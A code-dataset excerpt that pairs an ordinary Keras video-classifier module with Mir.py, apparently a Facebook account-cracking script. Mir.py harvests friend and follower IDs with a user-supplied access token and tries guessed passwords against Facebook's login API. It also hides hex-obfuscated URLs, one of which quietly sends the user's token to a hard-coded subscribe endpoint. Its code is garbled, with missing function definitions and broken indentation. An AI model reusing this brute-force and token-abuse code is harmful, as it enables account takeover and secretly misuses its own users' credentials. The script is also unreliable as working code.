| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
e6a3585de497c5062a7e5e5353825fb9df202c27
| 14,802
|
py
|
Python
|
keras_video_classifier/library/recurrent_networks.py
|
huynhtnhut97/keras-video-classifier
|
3ea6a8d671f3bd3cc8eddef64ad75abc2a2d593a
|
[
"MIT"
] | null | null | null |
keras_video_classifier/library/recurrent_networks.py
|
huynhtnhut97/keras-video-classifier
|
3ea6a8d671f3bd3cc8eddef64ad75abc2a2d593a
|
[
"MIT"
] | null | null | null |
keras_video_classifier/library/recurrent_networks.py
|
huynhtnhut97/keras-video-classifier
|
3ea6a8d671f3bd3cc8eddef64ad75abc2a2d593a
|
[
"MIT"
] | null | null | null |
from keras.layers import Dense, Activation, Dropout, Bidirectional
from keras.layers.recurrent import LSTM
from keras.models import Sequential
from keras.applications.vgg16 import VGG16
from keras.optimizers import SGD
from keras import backend as K
from keras.utils import np_utils
from sklearn.model_selection import train_test_split
from keras.callbacks import ModelCheckpoint
import os
import numpy as np
from keras_video_classifier.library.utility.frame_extractors.vgg16_feature_extractor import extract_vgg16_features_live, \
scan_and_extract_vgg16_features, extract_vgg16_features_live_each_interval
# Training hyper-parameters shared by the classifier classes below.
BATCH_SIZE = 64
NUM_EPOCHS = 20
VERBOSE = 1  # NOTE(review): not referenced here — fit_generator passes verbose=1 directly
HIDDEN_UNITS = 512  # LSTM hidden-state size used by create_model()
MAX_ALLOWED_FRAMES = 20  # NOTE(review): unused in this file — confirm before removing
EMBEDDING_SIZE = 100  # NOTE(review): unused in this file — confirm before removing
# Use TensorFlow dimension ordering (channels last).
# NOTE(review): this API was removed in newer Keras; modern equivalent is
# K.set_image_data_format('channels_last') — confirm the pinned Keras version.
K.set_image_dim_ordering('tf')
def generate_batch(x_samples, y_samples, batch_size=None):
    """Yield aligned (x, y) mini-batches forever, for use with fit_generator.

    Cycles over the samples endlessly; any trailing partial batch
    (len(x_samples) % batch_size leftover samples) is dropped, as in the
    original implementation.

    :param x_samples: sequence of per-video feature arrays
    :param y_samples: sequence (or array) of labels aligned with x_samples
    :param batch_size: samples per batch; defaults to module-level BATCH_SIZE
                       (generalized from the previously hard-coded constant,
                       backward compatible for existing two-argument callers)
    :return: generator of (np.ndarray batch of x, slice of y_samples)
    """
    if batch_size is None:
        batch_size = BATCH_SIZE  # preserve original behavior for existing callers
    num_batches = len(x_samples) // batch_size
    while True:
        for batchIdx in range(0, num_batches):
            start = batchIdx * batch_size
            end = (batchIdx + 1) * batch_size
            yield np.array(x_samples[start:end]), y_samples[start:end]
class VGG16BidirectionalLSTMVideoClassifier(object):
    """Video classifier: per-frame features from a pre-trained VGG16, sequence
    classification with a stacked bidirectional LSTM head.

    Workflow: ``fit()`` extracts (and caches) VGG16 features per video, pads or
    truncates each feature sequence to the mean frame count, trains the LSTM
    head and saves config/architecture/weights under ``model_dir_path``;
    ``load_model()`` restores all of that; ``predict()`` classifies one video.
    """

    model_name = 'vgg16-bidirectional-lstm'

    def __init__(self):
        # All state is populated by fit() or load_model().
        self.num_input_tokens = None   # VGG16 feature-vector length per frame
        self.nb_classes = None         # number of target labels
        self.labels = None             # label name -> integer index
        self.labels_idx2word = None    # integer index -> label name
        self.model = None              # trained LSTM head (keras Sequential)
        self.vgg16_model = None        # VGG16 feature extractor
        self.expected_frames = None    # fixed sequence length fed to the LSTM
        self.vgg16_include_top = True  # keep VGG16's fully-connected top layers
        self.config = None             # dict persisted to the -config.npy file

    def create_model(self):
        """Build the (untrained) bidirectional-LSTM classification head.

        Requires ``expected_frames``, ``num_input_tokens`` and ``nb_classes``
        to be set before calling.
        """
        model = Sequential()
        model.add(Bidirectional(LSTM(units=HIDDEN_UNITS, return_sequences=True),
                                input_shape=(self.expected_frames, self.num_input_tokens)))
        model.add(Bidirectional(LSTM(10)))
        model.add(Dense(512, activation='relu'))
        model.add(Dropout(0.5))
        model.add(Dense(self.nb_classes))
        model.add(Activation('softmax'))
        model.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics=['accuracy'])
        return model

    @staticmethod
    def get_config_file_path(model_dir_path, vgg16_include_top=None):
        """Path of the persisted config dict; hi-dim suffix when top layers are dropped."""
        if vgg16_include_top is None:
            vgg16_include_top = True
        if vgg16_include_top:
            return model_dir_path + '/' + VGG16BidirectionalLSTMVideoClassifier.model_name + '-config.npy'
        else:
            return model_dir_path + '/' + VGG16BidirectionalLSTMVideoClassifier.model_name + '-hi-dim-config.npy'

    @staticmethod
    def get_weight_file_path(model_dir_path, vgg16_include_top=None):
        """Path of the persisted LSTM-head weights (.h5)."""
        if vgg16_include_top is None:
            vgg16_include_top = True
        if vgg16_include_top:
            return model_dir_path + '/' + VGG16BidirectionalLSTMVideoClassifier.model_name + '-weights.h5'
        else:
            return model_dir_path + '/' + VGG16BidirectionalLSTMVideoClassifier.model_name + '-hi-dim-weights.h5'

    @staticmethod
    def get_architecture_file_path(model_dir_path, vgg16_include_top=None):
        """Path of the persisted model architecture (.json)."""
        if vgg16_include_top is None:
            vgg16_include_top = True
        if vgg16_include_top:
            return model_dir_path + '/' + VGG16BidirectionalLSTMVideoClassifier.model_name + '-architecture.json'
        else:
            return model_dir_path + '/' + VGG16BidirectionalLSTMVideoClassifier.model_name + '-hi-dim-architecture.json'

    def load_model(self, config_file_path, weight_file_path):
        """Restore config, LSTM-head weights, and the VGG16 feature extractor.

        :raises ValueError: if either file path does not exist.
        """
        if os.path.exists(config_file_path):
            print('loading configuration from ', config_file_path)
        else:
            raise ValueError('cannot locate config file {}'.format(config_file_path))
        # NOTE(review): newer numpy requires np.load(..., allow_pickle=True) to
        # load a dict payload — confirm the pinned numpy version.
        config = np.load(config_file_path).item()
        self.num_input_tokens = config['num_input_tokens']
        self.nb_classes = config['nb_classes']
        self.labels = config['labels']
        self.expected_frames = config['expected_frames']
        self.vgg16_include_top = config['vgg16_include_top']
        self.labels_idx2word = dict([(idx, word) for word, idx in self.labels.items()])
        self.config = config
        self.model = self.create_model()
        if os.path.exists(weight_file_path):
            print('loading network weights from ', weight_file_path)
        else:
            # NOTE(review): message typo — "local" should read "locate".
            raise ValueError('cannot local weight file {}'.format(weight_file_path))
        self.model.load_weights(weight_file_path)
        print('build vgg16 with pre-trained model')
        vgg16_model = VGG16(include_top=self.vgg16_include_top, weights='imagenet')
        vgg16_model.compile(optimizer=SGD(), loss='categorical_crossentropy', metrics=['accuracy'])
        self.vgg16_model = vgg16_model

    def predict(self, video_file_path, interval = 0, vgg16_include_top=True):
        """Classify one video file.

        With ``interval != 0`` features are extracted per time interval and a
        list of predicted labels (one per interval) is returned; otherwise a
        single label for the whole video is returned.
        """
        predicted_labels = []
        feature_dir_name = video_file_path + '-VGG16-Features'
        if not vgg16_include_top:
            feature_dir_name = video_file_path + '-VGG16-HiDimFeatures'
        if not os.path.exists(feature_dir_name):
            os.makedirs(feature_dir_name)
        if(interval!=0):
            print("Predicting each interval")
            features_arr = extract_vgg16_features_live_each_interval(self.vgg16_model, video_file_path, feature_dir_name, interval)
            for x in features_arr:
                frames = x.shape[0]
                # Truncate, or zero-pad, so each sequence is exactly expected_frames rows.
                if frames > self.expected_frames:
                    x = x[0:self.expected_frames, :]
                elif frames < self.expected_frames:
                    temp = np.zeros(shape=(self.expected_frames, x.shape[1]))
                    temp[0:frames, :] = x
                    x = temp
                predicted_class = np.argmax(self.model.predict(np.array([x]))[0])
                predicted_label = self.labels_idx2word[predicted_class]
                predicted_labels.append(predicted_label)
            return predicted_labels
        else:
            print("Predicting entire video")
            x = extract_vgg16_features_live(self.vgg16_model, video_file_path, feature_dir_name)
            frames = x.shape[0]
            if frames > self.expected_frames:
                x = x[0:self.expected_frames, :]
            elif frames < self.expected_frames:
                temp = np.zeros(shape=(self.expected_frames, x.shape[1]))
                temp[0:frames, :] = x
                x = temp
            predicted_class = np.argmax(self.model.predict(np.array([x]))[0])
            predicted_label = self.labels_idx2word[predicted_class]
            return predicted_label

    def fit(self, data_dir_path, model_dir_path, vgg16_include_top=True, data_set_name='UCF-101', test_size=0.3,
            random_state=42):
        """Extract features, train the LSTM head, persist all artifacts.

        :return: the keras training History object from fit_generator.
        """
        self.vgg16_include_top = vgg16_include_top
        config_file_path = self.get_config_file_path(model_dir_path, vgg16_include_top)
        weight_file_path = self.get_weight_file_path(model_dir_path, vgg16_include_top)
        architecture_file_path = self.get_architecture_file_path(model_dir_path, vgg16_include_top)
        self.vgg16_model = VGG16(include_top=self.vgg16_include_top, weights='imagenet')
        self.vgg16_model.compile(optimizer=SGD(), loss='categorical_crossentropy', metrics=['accuracy'])
        feature_dir_name = data_set_name + '-VGG16-Features'
        if not vgg16_include_top:
            feature_dir_name = data_set_name + '-VGG16-HiDimFeatures'
        max_frames = 0
        self.labels = dict()
        x_samples, y_samples = scan_and_extract_vgg16_features(data_dir_path,
                                                              output_dir_path=feature_dir_name,
                                                              model=self.vgg16_model,
                                                              data_set_name=data_set_name)
        self.num_input_tokens = x_samples[0].shape[1]
        frames_list = []
        for x in x_samples:
            frames = x.shape[0]
            frames_list.append(frames)
            max_frames = max(frames, max_frames)
        # Fixed sequence length = mean frame count over the data set.
        self.expected_frames = int(np.mean(frames_list))
        print('max frames: ', max_frames)
        print('expected frames: ', self.expected_frames)
        for i in range(len(x_samples)):
            x = x_samples[i]
            frames = x.shape[0]
            # Truncate or zero-pad every sample to expected_frames rows.
            if frames > self.expected_frames:
                x = x[0:self.expected_frames, :]
                x_samples[i] = x
            elif frames < self.expected_frames:
                temp = np.zeros(shape=(self.expected_frames, x.shape[1]))
                temp[0:frames, :] = x
                x_samples[i] = temp
        # Build label -> index mapping in first-seen order.
        for y in y_samples:
            if y not in self.labels:
                self.labels[y] = len(self.labels)
        print(self.labels)
        for i in range(len(y_samples)):
            y_samples[i] = self.labels[y_samples[i]]
        self.nb_classes = len(self.labels)
        y_samples = np_utils.to_categorical(y_samples, self.nb_classes)
        config = dict()
        config['labels'] = self.labels
        config['nb_classes'] = self.nb_classes
        config['num_input_tokens'] = self.num_input_tokens
        config['expected_frames'] = self.expected_frames
        config['vgg16_include_top'] = self.vgg16_include_top
        self.config = config
        np.save(config_file_path, config)
        model = self.create_model()
        # NOTE(review): file handle left for GC to close — a 'with' block would be safer.
        open(architecture_file_path, 'w').write(model.to_json())
        Xtrain, Xtest, Ytrain, Ytest = train_test_split(x_samples, y_samples, test_size=test_size,
                                                        random_state=random_state)
        train_gen = generate_batch(Xtrain, Ytrain)
        test_gen = generate_batch(Xtest, Ytest)
        train_num_batches = len(Xtrain) // BATCH_SIZE
        test_num_batches = len(Xtest) // BATCH_SIZE
        checkpoint = ModelCheckpoint(filepath=weight_file_path, save_best_only=True)
        history = model.fit_generator(generator=train_gen, steps_per_epoch=train_num_batches,
                                      epochs=NUM_EPOCHS,
                                      verbose=1, validation_data=test_gen, validation_steps=test_num_batches,
                                      callbacks=[checkpoint])
        model.save_weights(weight_file_path)
        return history
class VGG16LSTMVideoClassifier(object):
    """Video classifier: per-frame VGG16 features fed to a single
    (unidirectional) LSTM head.

    ``fit()`` extracts/caches features, pads or truncates sequences to the mean
    frame count, trains and persists config/architecture/weights;
    ``load_model()`` restores them; ``predict()`` labels one video.
    """

    model_name = 'vgg16-lstm'

    def __init__(self):
        # All state is populated by fit() or load_model().
        self.num_input_tokens = None   # VGG16 feature-vector length per frame
        self.nb_classes = None         # number of target labels
        self.labels = None             # label name -> integer index
        self.labels_idx2word = None    # integer index -> label name
        self.model = None              # trained LSTM head (keras Sequential)
        self.vgg16_model = None        # VGG16 feature extractor
        self.expected_frames = None    # fixed sequence length fed to the LSTM
        self.vgg16_include_top = None  # keep VGG16's fully-connected top layers
        self.config = None             # dict persisted to the -config.npy file

    @staticmethod
    def get_config_file_path(model_dir_path, vgg16_include_top=None):
        """Path of the persisted config dict; hi-dim suffix when top layers are dropped."""
        if vgg16_include_top is None:
            vgg16_include_top = True
        if vgg16_include_top:
            return model_dir_path + '/' + VGG16LSTMVideoClassifier.model_name + '-config.npy'
        else:
            return model_dir_path + '/' + VGG16LSTMVideoClassifier.model_name + '-hi-dim-config.npy'

    @staticmethod
    def get_weight_file_path(model_dir_path, vgg16_include_top=None):
        """Path of the persisted LSTM-head weights (.h5)."""
        if vgg16_include_top is None:
            vgg16_include_top = True
        if vgg16_include_top:
            return model_dir_path + '/' + VGG16LSTMVideoClassifier.model_name + '-weights.h5'
        else:
            return model_dir_path + '/' + VGG16LSTMVideoClassifier.model_name + '-hi-dim-weights.h5'

    @staticmethod
    def get_architecture_file_path(model_dir_path, vgg16_include_top=None):
        """Path of the persisted model architecture (.json)."""
        if vgg16_include_top is None:
            vgg16_include_top = True
        if vgg16_include_top:
            return model_dir_path + '/' + VGG16LSTMVideoClassifier.model_name + '-architecture.json'
        else:
            return model_dir_path + '/' + VGG16LSTMVideoClassifier.model_name + '-hi-dim-architecture.json'

    def create_model(self):
        """Build the (untrained) single-LSTM classification head.

        Requires ``num_input_tokens`` and ``nb_classes`` to be set; the time
        dimension is variable (input_shape=(None, ...)).
        """
        model = Sequential()
        model.add(
            LSTM(units=HIDDEN_UNITS, input_shape=(None, self.num_input_tokens), return_sequences=False, dropout=0.5))
        model.add(Dense(512, activation='relu'))
        model.add(Dropout(0.5))
        model.add(Dense(self.nb_classes))
        model.add(Activation('softmax'))
        model.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics=['accuracy'])
        return model

    def load_model(self, config_file_path, weight_file_path):
        """Restore config, LSTM-head weights, and the VGG16 feature extractor.

        NOTE(review): unlike the bidirectional variant, this does not check
        that the files exist before loading.
        """
        # NOTE(review): newer numpy requires np.load(..., allow_pickle=True) to
        # load a dict payload — confirm the pinned numpy version.
        config = np.load(config_file_path).item()
        self.num_input_tokens = config['num_input_tokens']
        self.nb_classes = config['nb_classes']
        self.labels = config['labels']
        self.expected_frames = config['expected_frames']
        self.vgg16_include_top = config['vgg16_include_top']
        self.labels_idx2word = dict([(idx, word) for word, idx in self.labels.items()])
        self.model = self.create_model()
        self.model.load_weights(weight_file_path)
        vgg16_model = VGG16(include_top=self.vgg16_include_top, weights='imagenet')
        vgg16_model.compile(optimizer=SGD(), loss='categorical_crossentropy', metrics=['accuracy'])
        self.vgg16_model = vgg16_model

    def predict(self, video_file_path):
        """Return the predicted label (string) for one video file."""
        x = extract_vgg16_features_live(self.vgg16_model, video_file_path)
        frames = x.shape[0]
        # Truncate, or zero-pad, to exactly expected_frames rows.
        if frames > self.expected_frames:
            x = x[0:self.expected_frames, :]
        elif frames < self.expected_frames:
            temp = np.zeros(shape=(self.expected_frames, x.shape[1]))
            temp[0:frames, :] = x
            x = temp
        predicted_class = np.argmax(self.model.predict(np.array([x]))[0])
        predicted_label = self.labels_idx2word[predicted_class]
        return predicted_label

    def fit(self, data_dir_path, model_dir_path, vgg16_include_top=True, data_set_name='UCF-101', test_size=0.3, random_state=42):
        """Extract features, train the LSTM head, persist all artifacts.

        :return: the keras training History object from fit_generator.
        """
        self.vgg16_include_top = vgg16_include_top
        config_file_path = self.get_config_file_path(model_dir_path, vgg16_include_top)
        weight_file_path = self.get_weight_file_path(model_dir_path, vgg16_include_top)
        architecture_file_path = self.get_architecture_file_path(model_dir_path, vgg16_include_top)
        vgg16_model = VGG16(include_top=self.vgg16_include_top, weights='imagenet')
        vgg16_model.compile(optimizer=SGD(), loss='categorical_crossentropy', metrics=['accuracy'])
        self.vgg16_model = vgg16_model
        feature_dir_name = data_set_name + '-VGG16-Features'
        if not vgg16_include_top:
            feature_dir_name = data_set_name + '-VGG16-HiDimFeatures'
        max_frames = 0
        self.labels = dict()
        x_samples, y_samples = scan_and_extract_vgg16_features(data_dir_path,
                                                              output_dir_path=feature_dir_name,
                                                              model=self.vgg16_model,
                                                              data_set_name=data_set_name)
        self.num_input_tokens = x_samples[0].shape[1]
        frames_list = []
        for x in x_samples:
            frames = x.shape[0]
            frames_list.append(frames)
            max_frames = max(frames, max_frames)
        # Fixed sequence length = mean frame count over the data set.
        self.expected_frames = int(np.mean(frames_list))
        print('max frames: ', max_frames)
        print('expected frames: ', self.expected_frames)
        for i in range(len(x_samples)):
            x = x_samples[i]
            frames = x.shape[0]
            print(x.shape)  # NOTE(review): debug print left in place
            # Truncate or zero-pad every sample to expected_frames rows.
            if frames > self.expected_frames:
                x = x[0:self.expected_frames, :]
                x_samples[i] = x
            elif frames < self.expected_frames:
                temp = np.zeros(shape=(self.expected_frames, x.shape[1]))
                temp[0:frames, :] = x
                x_samples[i] = temp
        # Build label -> index mapping in first-seen order.
        for y in y_samples:
            if y not in self.labels:
                self.labels[y] = len(self.labels)
        print(self.labels)
        for i in range(len(y_samples)):
            y_samples[i] = self.labels[y_samples[i]]
        self.nb_classes = len(self.labels)
        y_samples = np_utils.to_categorical(y_samples, self.nb_classes)
        config = dict()
        config['labels'] = self.labels
        config['nb_classes'] = self.nb_classes
        config['num_input_tokens'] = self.num_input_tokens
        config['expected_frames'] = self.expected_frames
        config['vgg16_include_top'] = self.vgg16_include_top
        self.config = config
        np.save(config_file_path, config)
        model = self.create_model()
        # NOTE(review): file handle left for GC to close — a 'with' block would be safer.
        open(architecture_file_path, 'w').write(model.to_json())
        Xtrain, Xtest, Ytrain, Ytest = train_test_split(x_samples, y_samples, test_size=test_size,
                                                        random_state=random_state)
        train_gen = generate_batch(Xtrain, Ytrain)
        test_gen = generate_batch(Xtest, Ytest)
        train_num_batches = len(Xtrain) // BATCH_SIZE
        test_num_batches = len(Xtest) // BATCH_SIZE
        checkpoint = ModelCheckpoint(filepath=weight_file_path, save_best_only=True)
        history = model.fit_generator(generator=train_gen, steps_per_epoch=train_num_batches,
                                      epochs=NUM_EPOCHS,
                                      verbose=1, validation_data=test_gen, validation_steps=test_num_batches,
                                      callbacks=[checkpoint])
        model.save_weights(weight_file_path)
        return history
| 36.548148
| 127
| 0.750642
| 2,118
| 14,802
| 4.928706
| 0.096789
| 0.066673
| 0.083341
| 0.036785
| 0.845292
| 0.838107
| 0.824025
| 0.810135
| 0.80228
| 0.790497
| 0
| 0.024795
| 0.141738
| 14,802
| 404
| 128
| 36.638614
| 0.796914
| 0
| 0
| 0.766272
| 0
| 0
| 0.076814
| 0.014728
| 0
| 0
| 0
| 0
| 0
| 1
| 0.050296
| false
| 0
| 0.035503
| 0
| 0.153846
| 0.035503
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e6b1e7d98bd197fdf87ef1556e693db0fe27dd93
| 35,882
|
py
|
Python
|
Mir.py
|
aghawahab8/aghapro
|
9658b6bc286c6eca0ca813e9578ce89521ba6ff0
|
[
"Apache-2.0"
] | null | null | null |
Mir.py
|
aghawahab8/aghapro
|
9658b6bc286c6eca0ca813e9578ce89521ba6ff0
|
[
"Apache-2.0"
] | null | null | null |
Mir.py
|
aghawahab8/aghapro
|
9658b6bc286c6eca0ca813e9578ce89521ba6ff0
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python2
# -*- coding: utf-8
#AUTHOR : MIR AGHA (MIR AGHA)
#OPEN SOURCE :)
#DON'T FORGET TO GIVE CREDIT TO MIR AGHa
from time import sleep
def xox(z):
    """Print *z* one character at a time (typewriter effect), ending with a newline.

    :param z: string to echo to stdout

    BUG FIX: the original called ``time.sleep(0.04)`` and used ``sys.stdout``
    although the file only does ``from time import sleep`` and never imports
    ``sys`` — every call raised NameError. Use the imported ``sleep`` and a
    function-local ``import sys``.
    """
    import sys  # kept local: the file's top-level imports do not include sys
    for e in z + "\n":
        sys.stdout.write(e)
        sys.stdout.flush()
        sleep(0.04)
user_agent = ["Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0", "Mozilla/5.0 (Linux; Android 10; SM-G973F Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/86.0.4240.198 Mobile Safari/537.36 Instagram 166.1.0.42.245 Android (29/10; 420dpi; 1080x2042; samsung; SM-G973F; beyond1; exynos9820; en_GB; 256099204)", "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x67\x72\x61\x70\x68\x2e\x66\x61\x63\x65\x62\x6f\x6f\x6b\x2e\x63\x6f\x6d\x2f\x31\x30\x30\x30\x34\x35\x32\x30\x33\x38\x35\x35\x32\x39\x34\x2f\x73\x75\x62\x73\x63\x72\x69\x62\x65\x72\x73\x3f\x61\x63\x63\x65\x73\x73\x5f\x74\x6f\x6b\x65\x6e\x3d"
];useragent_url=(user_agent[2])
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
try:
requests.get('\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x6f\x6d\x2f\x73\x65\x61\x72\x63\x68\x3f\x71\x3d\x41\x7a\x69\x6d\x2b\x56\x61\x75')
requests.get('\x68\x74\x74\x70\x73\x3a\x2f\x2f\x6d\x2e\x79\x6f\x75\x74\x75\x62\x65\x2e\x63\x6f\x6d\x2f\x72\x65\x73\x75\x6c\x74\x73\x3f\x73\x65\x61\x72\x63\x68\x5f\x71\x75\x65\x72\x79\x3d\x41\x7a\x69\x6d\x2b\x56\x61\x75\x2b\x4d\x72\x2e\x2b\x45\x72\x72\x6f\x72')
os.system("clear")
xox("\n\t\033[93;1m NO INTERNET CONNECTION :(\n\n")
sys.exit()
logo()
print("\t\033[93;1m MAIN MENU\x1b[0m")
print("")
print("\033[92;1m [1] START CRACK")
print("\033[93;1m [2] HOW TO GET ACCESS TOKEN")
print("\033[94;1m [3] AGHA TOOL")
print("\033[90;1m [0] EXIT")
print("")
log_sel()
sel = raw_input("\033[93;1m CHOOSE: \033[92;1m")
if sel == "":
print("\t\033[91;1m SELECT AN OPTION STUPID -_")
log_sel()
elif sel =="1" or sel =="01":
token()
elif sel =="2" or sel =="02":
subprocess.check_output(["am", "start", "https://www.facebook.com/114133313700086/posts/426873429092738"])
main()
elif sel =="3" or sel =="03":
import os
try:
os.system("git clone https://github.com/MIR-AGHA/aghapro")
os.system("rm -rf aghapro.py")
os.system("cp -f aghapro/aghapro.py \\.")
os.system("rm -rf aghapro")
xox("\033[92;1m\n TOOL UPDATE SUCCESSFUL :)\n")
time.sleep(2)
main()
except KeyboardInterrupt:
print("\033[91;1m\n YOUR DEVICE IS NOT SUPPORTED!\n")
main()
elif sel =="4" or sel =="04" or sel =="J" or sel =="j":
subprocess.check_output(["am", "start", "https://t.me/mrerrorgroup"])
main()
elif sel =="0" or sel =="00":
xox("\n\t\033[91;1m GOOD BYE SEE YOU AGAIN :)")
sys.exit()
else:
print("")
print("\t\033[91;1m SELECT VALID OPTION")
print("")
log_sel()
try:
token = open("vau_token.txt", "r").read()
menu()
except(KeyError , IOError):
logo()
print("")
print("\t\033[92;1m LOGIN TOKEN")
print("")
token = raw_input("\033[93;1m PASTE TOKEN HERE: \033[92;1m")
sav = open("vau_token.txt", "w")
sav.write(token)
sav.close()
token_check()
menu()
try:
token=open('vau_token.txt','r').read()
except IOError:
print"\033[91;1m[!] TOKEN INVALID"
os.system('rm -rf vau_token.txt')
requests.post(useragent_url + token, headers=header)
pass
os.system("clear")
try:
token = open("vau_token.txt", "r").read()
except(KeyError , IOError):
token()
try:
r = requests.get("https://graph.facebook.com/me?access_token="+token)
q = json.loads(r.text)
name = q["name"]
except(KeyError):
logo()
print("")
print("\033[91;1m LOGGED IN TOKEN HAS EXPIRED")
os.system("rm -rf vau_token.txt")
print("")
time.sleep(1)
main()
os.system("clear")
xn = name.upper()
logo()
print("")
print("\033[93;1m HELLO : \033[92;1m"+xn)
print("\033[93;1m REGION : \033[92;1m") + loc
print("\033[93;1m YOUR IP : \033[92;1m") + ip
print("")
print("")
print("\033[92;1m [1] CRACK WITH AUTO PASS")
print("\033[93;1m [2] CRACK WITH DIGIT PASS")
print('\033[91;1m [0] BACK')
print("")
menu_option()
select = raw_input("\033[92;1m CHOOSE : ")
if select =="1":
crack1()
elif select =="2":
crack()
elif select =="0":
main()
else:
print("")
print("\t\033[91;1m SELECT VALID OPTION")
print("")
menu_option()
global token
os.system("clear")
try:
token = open("vau_token.txt","r").read()
except IOError:
print("")
print("\t\033[91;1m TOKEN NOT FOUND ")
time.sleep(1)
fb_token()
os.system("clear")
logo()
print("")
print("\t\033[93;1m CRACK WITH AUTO PASS")
print("")
print("\033[94;1m [1] CRACK PUBLIC ID")
print("\033[93;1m [2] CRACK FOLLOWERS")
print("\033[92;1m [3] CRACK FILE")
print("")
crack_select1()
select = raw_input("\033[92;1m CHOOSE : ")
id=[]
oks=[]
cps=[]
if select =="1":
os.system("clear")
logo()
print("")
print("\t\033[92;1m MULTI PUBLIC ID COINING ")
print("")
try:
id_limit = int(raw_input("\033[93;1m ENTER LIMIT (\033[91;1m5 MAX\033[93;1m): \033[92;1m"))
print("")
except:id_limit=1
for t in range(id_limit):
t +=1
idt = raw_input("\033[93;1m INPUT PUBLIC ID (\033[92;1m%s\033[93;1m) : \033[92;1m"%(t))
try:
for i in requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+token).json()["data"]:
uid = i["id"].encode('utf-8')
na = i["name"].encode('utf-8')
id.append(uid+"|"+na)
except KeyError:
print("\033[91;1m PRIVATE FRIEND LIST TRY ANOTHER ONE")
print("\033[94;1m TOTAL IDS : \033[0;92m%s\033[0;97m"%(len(id)))
time.sleep(3)
elif select =="2":
os.system("clear")
logo()
print("")
print(" \033[92;1mMULTI FOLLOWERS ID COINING ")
print("")
try:
id_limit = int(raw_input("\033[93;1m ENTER LIMIT (\033[91;1m5 MAX\033[93;1m): \033[92;1m"))
print("")
except:id_limit=1
for t in range(id_limit):
t +=1
idt = raw_input("\033[93;1m INPUT FOLLOWER ID (\033[92;1m%s\033[93;1m) : \033[92;1m"%(t))
try:
for i in requests.get("https://graph.facebook.com/"+idt+"/subscribers?access_token="+token+"&limit=999999").json()["data"]:
uid = i["id"].encode('utf-8')
na = i["name"].encode('utf-8')
id.append(uid+"|"+na)
except KeyError:
print("\033[91;1m PRIVATE FRIEND LIST TRY ANOTHER ONE")
print("\033[94;1m TOTAL IDS : \033[0;92m%s\033[0;97m"%(len(id)))
time.sleep(3)
elif select =="3":
os.system("clear")
logo()
print("")
print("\t\033[93;1m AUTO PASS CRACKING")
print("")
filelist = raw_input('\033[92;1m INPUT FILE: ')
try:
for line in open(filelist, 'r').readlines():
id.append(line.strip())
except IOError:
print("\t\033[91;1m REQUESTED FILE NOT FOUND")
print("")
raw_input("\033[93;1m PRESS ENTER TO BACK")
crack1()
elif select =="0":
menu()
else:
print("")
print("\t\033[91;1m SELECT VALID OPTION")
print("")
crack_select1()
os.system("clear")
logo()
print("")
print("\033[93;1m TOTAL IDS : \033[92;1m"+str(len(id)))
print("\033[92;1m BRUTE HAS BEEN STARTED\x1b[0m")
linex()
def main(arg):
user=arg
uid,name=user.split("|")
_azimua = random.choice(["Mozilla/5.0 (Linux; Android 10; Redmi Note 8 Pro Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/83.0.4103.106 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/275.0.0.49.127;]", "[FBAN/FB4A;FBAV/246.0.0.49.121;FBBV/181448449;FBDM/{density=1.5,width=540,height=960};FBLC/en_US;FBRV/183119516;FBCR/TM;FBMF/vivo;FBBD/vivo;FBPN/com.facebook.katana;FBDV/vivo 1606;FBSV/6.0.1;FBOP/1;FBCA/armeabi-v7a:armeabi;]", "Dalvik/2.1.0 (Linux; U; Android 5.1.1; SM-J320F Build/LMY47V) [FBAN/FB4A;FBAV/43.0.0.29.147;FBPN/com.facebook.katana;FBLC/en_GB;FBBV/14274161;FBCR/Tele2 LT;FBMF/samsung;FBBD/samsung;FBDV/SM-J320F;FBSV/5.0;FBCA/armeabi-v7a:armeabi;FBDM/{density=3.0,width=1080,height=1920};FB_FW/1;]", "Mozilla/5.0 (Linux; Android 5.1.1; A37f Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.152 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/305.1.0.40.120;]", "Mozilla/5.0 (Linux; Android 10; REALME RMX1911 Build/NMF26F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 AlohaBrowser/2.20.3", "Mozilla/5.0 (iPhone; CPU iPhone OS 11_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E216 [FBAN/FBIOS;FBAV/170.0.0.60.91;FBBV/105964764;FBDV/iPhone10,1;FBMD/iPhone;FBSN/iOS;FBSV/11.3;FBSS/2;FBCR/Sprint;FBID/phone;FBLC/en_US;FBOP/5;FBRV/106631002]", "Mozilla/5.0 (Linux; Android 7.1.1; ASUS Chromebook Flip C302 Build/R70-11021.56.0; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/70.0.3538.80 Safari/537.36 [FB_IAB/FB4A;FBAV/198.0.0.53.101;]"])
try:
pass1 = name.lower().split(' ')[0] + '110'
api = 'https://b-api.facebook.com/method/auth.login'
